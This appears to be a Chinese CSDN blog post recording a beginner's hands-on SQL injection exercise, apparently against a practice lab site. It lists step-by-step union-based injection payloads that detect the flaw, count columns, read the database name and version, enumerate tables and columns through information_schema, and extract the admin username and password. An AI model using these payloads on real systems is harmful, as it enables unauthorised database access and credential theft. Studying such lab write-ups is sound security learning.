SQL注入攻击原理 实战

本文介绍了SQL注入攻击的实战过程,从判断网站是否存在SQL漏洞,到确定字段、查询数据库、获取版本信息、揭示数据库表名和字段名,一步步揭示了攻击的详细步骤。最终,作者成功找到了关键信息。
摘要由CSDN通过智能技术生成

我来进行实战了,总在看教程。


前言

提示:这里可以添加本文要记录的大概内容:
前言,前言,前言(挠头)啊,我终于打实战了


提示:以下是本篇文章正文内容,下面案例可供参考

一,网站是否存在sql漏洞

 ?id=1 and 1=1

在这里插入图片描述
看这样子,应该是不存在的

如果没有就继续吧,

?id=1 and 1=2

在这里插入图片描述

哎,你看它变了,

二、判断一下字段

?id=1 and 1=1 order by 1

在这里插入图片描述
又回来了,没有那就试试这个?

?id=1 and 1=1 order by 2

在这里插入图片描述
哦,我的天啊,事不过三,试试这个

?id=1 and 1=1 order by 3

goog,成功了
在这里插入图片描述

3. 判断显点

?id=1 and 1=2 union select 1,2

在这里插入图片描述

你看,那里有个2

4.查找相关信息

1.查询数据库

?id=1 and 1=2 union select 1,database()

在这里插入图片描述
好吧,数据库名称就叫猫舍 辛巴

2.版本

?id=1 and 1=2 union select 1,version()

在这里插入图片描述

没啥可说的,

3.数据库表名

 ?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1

我承认这个长了点,我笔记也写了这么多
在这里插入图片描述

4.字段名

?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1 

在这里插入图片描述

?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1

在这里插入图片描述

5,查询

 ?id=1 and 1=2 union select 1,username from admin  limit 0,1

在这里插入图片描述

又回来了,

 ?id=1 and 1=2 union select 1,password from admin  limit 0,1

好了,拿到key了
在这里插入图片描述


总结

我是照着我记得笔记进行的,本文素材来自这里
有谁知道上面这只猫叫什么名字?看起来还不错,应该好养

评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

「已注销」

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值